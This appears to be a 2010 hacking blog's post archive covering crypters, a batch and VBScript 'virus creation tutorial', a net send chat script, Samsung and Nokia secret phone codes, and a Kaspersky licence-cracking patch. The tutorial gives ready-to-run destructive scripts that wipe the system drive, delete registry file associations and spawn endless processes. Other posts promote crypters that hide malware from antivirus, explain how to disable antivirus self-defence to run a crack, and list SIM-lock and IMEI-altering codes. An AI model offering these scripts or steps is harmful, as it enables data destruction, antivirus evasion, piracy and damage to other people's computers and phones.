Wednesday, December 29, 2010

47. Invisible Secrets 4- A wonderful Cryptor

Invisible Secrets 4 not only encrypts your data and files for safe keeping or for secure transfer across the net, it also hides them in places that on the surface appear totally innocent, such as picture or sound files, or web pages. These types of files are a perfect disguise for sensitive information. Using our file encryption software nobody, not even your wife, boss, or a hacker would realize that your important papers or letters are stored in your last holiday pictures, or that you use your personal web page to exchange messages or secret documents. With Invisible Secrets 4 - File encryption software you may encrypt and hide files directly from Windows Explorer, and then automatically transfer them by e-mail or via the Internet.

46. Hack Using Crypter



What is Crypter???

Crypter is free software used to hide our viruses, RATs or any keylogger from antiviruses so that they are not detected and deleted by antiviruses. Thus, a crypter is a program that allow users to crypt the source code of their program. Generally, antivirus work by splitting source code of application and then search for certain string within source code.

If antivirus detects any certain malicious strings, it either stops scan or deletes the file as virus from system.

45. The 8 deadly windows .vbs commands




Note:- The Following tutorial is for educational purpose only. If you harm your or your friend’s computer using the following tutorial, PCBLACKSTUFFS is not responsible for your loss. 
Here on http://comp-hackers.blogspot.com/ , I am going to provide some of my favorite .vbs codes,I use to play with in my childhood days.You can use these codes as a small term virus. Hence , you can also call this tutorial a virus creation tutorial.


To use the codes I am going to provide, all you need to do is to copy the codes from iTechnoBuzz, paste it in any notepad or text file, than save the text file with anynam.vbs , and yeah dont forget to change the format from text file to all files.

*NOTE* these codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANETLY deletes files on the computer that cannot be recovered. this will DESTROY the computer.
-The blue screen of Death [this might be dangerous]
Code:-
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
-Stupidity Shutdown
*This pops up a funny message then will shutdown the computer*
code:-
@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c “Error! You are too stupid!” -s -t 10
-Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)*
Code:-
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked. Have a nice day.
GOTO MESSAGE
-Endless Notepads
*This will pop up endless notepads until the computer freezes and crashes*
Code:-
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
-Crazy caps lock
*This constantly turns caps lock on and off really fast continuously*
Code:-
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
-Endless Enter
*This constantly makes it so the enter button is being pressed continuesly*
Code:-
Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
-Endless Backspace
*This makes it so the backspace key is constantly being pressed*
Code:-
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
-Popping CD Drives
*This will make the CD drives constantly pop out*
Code:-
Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

Thursday, December 23, 2010

44. Chat in MS-DOS

\Today in this post i will show  you that how you can chat with your friends on internet or without internet through MS-DOS, yup thats right we can chat  in ms-dos through command prompt. its pretty easy and interesting  too. So lets start from first step.

1) So for chatting with your friend you need his/her computer’s IP address.
2) After getting IP address now, copy paste below written code as it is.
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%

Pause
Goto A

3) Now save this as “RahulTyagi.Bat”, or “Messenger.bat” [You can rename with your name]
4) Now just open Command Prompt.
5) Either you can drag this file (.bat file) over to Command Prompt or just double click on the file and press Enter.
6) Instantly you will see a screen like below
7) Now, you have to type the person’s IP address ( he he not Person’s , I means, computer’s IP address). After entering you will see screen like below
 Now you’re done, now chat with your girl friend at school or even in Lab, Especially when she is not near by you. 

Monday, December 20, 2010

43. Samsung Mobile Tricks & Codes

Samsung Reset Codes

You can try these in case you downloaded corrupted or incompatible Java midlets or other media, which are causing problems with the phone.
*2767*JAVA# Java Reset and (Deletes all Java Midlets)

*2767*MEDIA# Reset Media (Deletes All Sounds and Pics)

*2767*WAP# Wap Reset

*2767*CUST# Reset Custom EEPR0M

*2767*FULL# Reset Full EEPR0M (Caution)

For example : *2767*JAVA# would be keyed in as *2767*5282#


Note : Not all codes will work with SGH-C100.

Other Samsung Codes

*#06# IMEI code

*#9998*4357# Help Menu

*#9998*5282# Java menu (GRPS/CSD settings for JAVA server)

*#9999#0# Monitor Mode

*#9999# or *#9998*9999# Software Version

*#8888# or *#9998*8888# Hardware Version

*#9998*746# or *#9998*0746# or *#0746# Sim Infos

*#9998*523# or *#9998*0523# or *#0523# Display Contrast

*#9998*842# or *#9998*0842# or *#0842# Vibration On (until you push OK)

*#9998*289# or *#9998*0289# or *#0289# Buzzer On (until you push OK)

*#9998*288# or *#9998*0288# or *#0288# Battery & Field Infos

*#9998*377# or *#9998*0377# Error log

*#9998*778# or *#9998*0778# or *#0778# Sim Service table

*#9998*782# show date and alarm clock

*#8999*638# show network information

*#9998*5646# change operator logo at startup

*#9998*76# production number

*#9998*968# view melody for alarm

*#9998*585# Non-Volatile Memory (NVM)

*#3243948# Digital Audio Interference Off

*#32436837# Digital Audio Interference On


 SAMSUNG T100 SECRET CODES 

*#06# -> Show IMEI
*#9999# -> Show Software Version
*#0001# -> Show Serial Parameters
*2767*3855# -> Full EEPROM Reset ( THIS CODE REMOVES SP-LOCK!!!! but also change IMEI to 447967-89-400044-0, you must use CHGIMEI to restore it)
*2767*2878# -> Custom EEEPROM Reset
*#8999*228# -> Battery status (capacity, voltage, temperature)
*#8999*246# -> Program status
*#8999*289# -> Change Alarm Buzzer Frequency
*#8999*324# -> Debug screens
*#8999*364# -> Watchdog
*#8999*377# -> EEPROM Error Stack
*#8999*427# -> Trace Watchdog
*#8999*523# -> Change LCD contrast
*#8999*544# -> Jig detect
*#8999*636# -> Memory status
*#8999*746# -> SIM File Size
*#8999*778# -> SIM Service Table
*#8999*785# -> RTK (Run Time Kernel) errors
*#8999*786# -> Run, Last UP, Last DOWN
*#8999*837# -> Software Version
*#8999*842# -> Test Vibrator
*#8999*862# -> Vocoder Reg
*#8999*872# -> Diag
*#8999*947# -> Reset On Fatal Error
*#8999*999# -> Last/Chk
*#8999*9266# -> Yann debug screen (=Debug Screens?)
*#8999*9999# -> Software version

SAMSUNG V200 SECRET CODES 

v200 Unlock Code-> *2767*7822573738#
*#9324# Netmon (press the hangup key to exit)
*#9998*JAVA# Edit GPRS/ CSD settings (S100 Only)
*#9998*Help# Help screen/ List of codes
*#9998*LOGO# Change operator Logo
*#9998*RTC# RTC Display
*#9998*Bat# Battery Status
*#9998*Buz# Turns Buzzer ON
*#9998*Vib# Turns Vibrator ON
*#9998*LCD# LCD Contrast
*#9998*9999# Softwre Version
*#9998*8888# Hardware Version
*#9998*377# NVM Error Log (?????)
*#9998*NET# SIM Network ID
*#9998*778# SIM Serv. Table
*#9998*SIM# SIM Info
*#9998*PN# Production No.
*#9998*968# Reminder Tune
*#9998*NVM# Displays Non-Volitile Memory Status
*#9999*C# ???????????????????
*#06# Displays phones I**I No.
***/// ***/// NOTE /// *** RED COLOR , they appear serious !!! Use at
own risk !!!
*#9998*2576# Forces SIM Error
*#9998*DEAD# Forces Phone Crash
*2767*MEDIA# Resets the medis on the phone (deletes all downloaded
pics/tones)
*2767*FULL# Resets the EEPRON *DANGEROUS*
*2767*CUST# Resets the Custom EEPRON
*2767*JAVA# Resets JAV downloads (deletes all downloaded midlits)
*2767*STACKRESET# Resets Stack
*2767*225RESET# ????????????????? * Dangerous *
*2767*WAP# Resets WAP Setting & Deletes Favorites 

SAMSUNG A800 SECRET CODES 

The universal unlock code is *2767*637# do this with out your sim in
By default, the firmware (software) for x600 only receives java
apps and other applications like stuff by serial port.
but even for it, you have to enable the serial port, which also
causes
the closing of all other ports, even the IrDA too :-( ..
well, guess what, i have very good news for you,
do you know, you can increase the sound level,
the sound level for tones, speaker fone, etc,
can be increase even then if it is at max (level 4)
you still can do it,
just follows the instructions!
**************** HERE WE GO **************
Enter the following code:
*#8999*8378#
(You'll be shown menu, then ...)
then go to:
"H/W test"
then go to:
"Audio Settings"
then go to:
"Melody Gain"
There will you see a number.
there are five (5) Melody Levels" of it.
(and currently, you are at level 1 and after
pressing the "save" button, you will move to
level 2 and so on .........................)
you have to change the values of all the levels.
and as the resultant, it will give increase the
melody sound!, your tones will more louder,
even more louder then the max. ringing volume.
the level wise numbers are: (as its my setting :-) )
Melody Level 1: 13
Melody Level 2: 17
Melody Level 3: 18
Melody Level 4: 25
Melody Level 5: 31
you even can make your own combinations of level wise
sounding numbers that can change the sound level!.
if your combination cause more louder sound level,
then mine,
then do share it with the group! ... :-)
meanwhile, try my figured-out combination!

************ CAUTION ************
if anything goes wrong,
then you can apply the master reset code,
that will NOT delete anything, ANYTHING from your
cell fone, but set each and eveything to its
default/standard setting ...
(likes, factory settings :-) )
the master reset code is:
#*7728#
#########################################
I take no responsibility of these codes are working or not,
or its effects on your cell fone
but i have tried these codes on my cell fone.
and i bet, nothing goes wrong,
but even then of my words, be carefull!,
#########################################
The code: *#8999*8378#
as i regarded it a informative code,
will tell you each and everything about your cell fone.
and in the "H/W test",
there are lot of other Audio settings,
each of them having five (5) levels,
you can change the combination, but before doing anything,
do write the defult number sequence to some place so that
you'll be then able to invert it again! .. :-) ...
#*2558# - Time ON
#*2527# - GPRS Switching Set to class {4/8/9/10}
#*4263# - Handsfree Mode: ACTIVATED
#*53696# - [Java dnload] WAPSAR mode
#*536961# - WAPSAR enable HTTP disable
#*536962# - HTTP enable WAPSAR disable
#*536963# - SERIAL enable Others disable
#*5663351# - [Phone Model] SAMSUNG SGH-X100
#*6420# - Mic off
#*6421# - Mic on
#*7632# - Sleep mode
*#8999*523# - Main LCD Brightness
*#8999*3825523# - (?) External display
*2767*3855# - Full EEPROM reset(Reset all type of locks)also you'll
lose pictures and java not melody
Remove camera sound:
On main screen type:
*#8999*8378# --> Test mode
H/W test
Audio Settings
Melody Gain
Then replace 6 by 0, it'll show 12 but it's OK
Press back until main screen
Then press key volume to minimum and let's try !!! no more sound
tip by C-Quest
*2767*688# resets the phone

42. Use Kaspersky Antivirus 2010 forever

In this post I'll be talking about a simple hack how to use Kaspersky Antivirus 2010 or Kaspersky Internet Security 2010 final build forever. This small tool written by some enthusiasts exploits the Kaspersky Antivirus 2010 final build to think this as some kinda beta version by the Kaspersky server and it continues to get free access to latest virus definition uninterruptedly. Simply say Kaspersky Antivirus 2010never expires at all. Grab this great hack tool for yourself today and enjoy Kaspersky Antivirus 2010 unlimited forever. Believe it or not its for you to test. Proceed with the instruction given below. 



Instructions for using the Hack Patch Method:

1. You must first have Kaspersky installed.

2. Please run PatchFix.exe before doing anything or this WILL NOT WORK!

3. After that open your Kaspersky and click "Options" and untick "Enable Self-Defence".

4. Run Kaspersky Patcher.exe

5. Choose the 32-bit or 64-bit OS and click Patch.

6. You now have the full version of Kaspersky 2010 forever!

Note: This hack tools are not virus as may be detected by Kaspersky or some antivirus.To check if this is not infected by malware, upload this to http://www.virustotal.com/ for independent virus scanning.

Download:
Kaspersky Patcher  

Kaspersky Antivirus 2010  
Kaspersky Internet Security 2010

41. Nokia phone secret codes

On the main screen type in:
*#06# for checking the IMEI (International Mobile Equipment Identity).
*#7780# reset to factory settings.
*#67705646# This will clear the LCD display(operator logo).
*#0000# To view software version.
*#2820# Bluetooth device address.
*#746025625# Sim clock allowed status.
#pw+1234567890+1# Shows if sim have restrictions.
*#92702689# - takes you to a secret menu where you may find some of the information below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repair - if found (0000)
5. Shows life timer of phone (time passes since last start)
*#3370# - Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though.
*#3370* - (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone receives less signal from network.
*#4720# - Half Rate Codec activation.
*#4720* - Half Rate Codec deactivation. The phone will automatically restart
If you forgot wallet code for Nokia S60 phone, use this code reset: *#7370925538#
Note, your data in the wallet will be erased. Phone will ask you the lock code. Default lock code is: 12345
Press *#3925538# to delete the contents and code of wallet.
Unlock service provider: Insert sim, turn phone on and press vol up(arrow keys) for 3 seconds, should say pin code. Press C,then press * message should flash, press * again and 04*pin*pin*pin# \
*#7328748263373738# resets security code.
Default security code is 12345
Change closed caller group (settings >security settings>user groups) to 00000 and ure phone will sound the message tone when you are near a radar speed trap. Setting it to 500 will cause your phone 2 set off security alarms at shop exits, gr8 for practical jokes! (works with some of the Nokia phones.) Press and hold "0" on the main screen to open wap browser.
Code Function
*3370# Activate Enhanced Full Rate Codec (EFR) - Your phone uses the best sound quality but talk time is reduced my approx. 5%
#3370# Deactivate Enhanced Full Rate Codec (EFR)
*#4720# Activate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time
*#4720# Deactivate Half Rate Codec
#pw+1234567890+1# Provider Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)
#pw+1234567890+2# Network Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)
#pw+1234567890+3# Country Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)
#pw+1234567890+4# SIM Card Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)
12345 This is the default security code
*#21# Allows you to check the number that “All Calls” are diverted to
*#30# Lets you see the private number
*#43# Allows you to check the “Call Waiting” status of your phone.
*#61# Allows you to check the number that “On No Reply” calls are diverted to
*#62# Allows you to check the number that “Divert If Unreachable (no service)” calls are diverted to
*#67# Allows you to check the number that “On Busy Calls” are diverted to
*#0000# Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release Date, 3rd Line : Compression Type
*#9999# Phones software version if *#0000# does not work
*#06# For checking the International Mobile Equipment Identity (IMEI Number)
*#67705646# Removes operator logo on 3310 & 3330
*#73# Reset phone timers and game scores
*#746025625# Displays the SIM Clock status, if your phone supports this power saving feature “SIM Clock Stop Allowed", it means you will get the best standby time possible
*#94870345123456789# Deactivate the PWM-Mem
press and hold # Lets you switch between lines
*#7760# Manufacturers code
*#7780# Restore factory settings
*#8110# Software version for the nokia 8110
*#92702689# Displays - 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off then on again
**21*number# Turn on “All Calls” diverting to the phone number entered
**61*number# Turn on “No Reply” diverting to the phone number entered
**67*number# Turn on “On Busy” diverting to the phone number entered
Nokia Secret Codes
The complete guide
Here's a list of known codes on Nokia mobile phones. This list does not include codes that make request to the network. To use these codes, just dial them like normal numbers.
Code    Description
*#06#    Display the IMEI (GSM standard)
*#0000#    Display the firmware version and date (with variant info on S40 second edition or newer)
*#9990#    Says "Bluetooth Test Mode" on Symbian models; accepts without any messages and Bluetooth behaves abnormally on non-Symbian ones (models with build-in Bluetooth radio, activate first to use)
*#bta0#    Display the Bluetooth MAC address (models with build-in Bluetooth radio, activate first to show address)
*#mac0wlan#    Display the WLAN MAC address (models with build-in Wi-fi radio)
*#opr0logo#    Clear the operator logo (3310 and 3330 only)
*#pca0#    Activate the GPRS PCCCH support (early GPRS models)
*#pcd0#    Deactivate the GPRS PCCCH support (early GPRS models)
*#res0wallet#    Reset the mobile wallet (models with mobile wallet)
*#res0#    Soft-format the memory (Symbian models only)
*#rst0#    Reset to factory defaults, confirmation required (DCT4 or newer)
*#sim0clock#    Display the SIM clock status (DCT3 only)
*#ssn0#    Display the manufacturing serial number (mid-range and premium DCT3, basically all DCT4 and BB5 non-Symbian models)
*#war0anty#    Display the manufacturing and repair info (no exit on DCT3) or total talk time on
Symbian models
*efr0#    Enable EFR encoding (pre-2003 models)
#efr0#    Disable EFR encoding (pre-2003 models)
*hra0#    Enable HR encoding (pre-2003 models)
#hra0#    Disable HR encoding (pre-2003 models)
#pw+1234567890+n#    Display the SIM lock status: (pre-2003 models)
n = 1: provider lock
n = 2: network lock
n = 3: country lock
n = 4: SIM lock
n#    n = 1..999: recall the number stored in the SIM location n (DCT3, DCT4, BB5 models)
These codes will work on most Nokia Mobile Phones to activate/deactivate advanced hidden functions that you can’t change through the phone menu
One useful function that all Nokia’s I’ve owned have is “Cell Info Display” which can usually be found in the phones “Display settings” (eg: in a Nokia 1600) or “Phone Settings” (eg: in a Nokia 3315)
If your network supports it, when “Cell Info Display” is enabled, it will display the name of the base station your mobile is currently connected to on the screen. eg: when i’m walking around the city it says “Sydney CBD” and when i’m at home it displays the name of my suburb.
Note:
To display “p” press “*” three times within one second, To display “w” press “*” four times within one second, To display “+” press twice “*” within less than a second
Code Function
*3370# / #3370# Activate / Deactivate Enhanced Full Rate Codec (EFR) - Your phone uses the best sound quality but talk time is reduced my approx. 5%
*#4720# / *#4720# Activate / Deactivate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time
*#7220# / *#7230# Enable / Disable PCCCPH support (faster GPRS)
#pw+1234567890+1# Provider Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)
#pw+1234567890+2# Network Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)
#pw+1234567890+3# Country Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)
#pw+1234567890+4# SIM Card Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)
12345 This is the default security code
*#0000# Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release Date, 3rd Line : Compression Type
*#9999# Phones software version if *#0000# does not work
*#06# For checking the International Mobile Equipment Identity (IMEI Number)
*#67705646# Removes operator logo on 3310 & 3330
*#73# Reset phone timers and game scores
*#746025625# Displays the SIM Clock status, if your phone supports this power saving feature “SIM Clock Stop Allowed”, it means you will get the best standby time possible
press and hold # Lets you switch between lines
*#7760# Manufacturers code
*#7780# Restore factory settings
*#8110# Software version for the nokia 8110
*#92702689# Displays - 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off then on again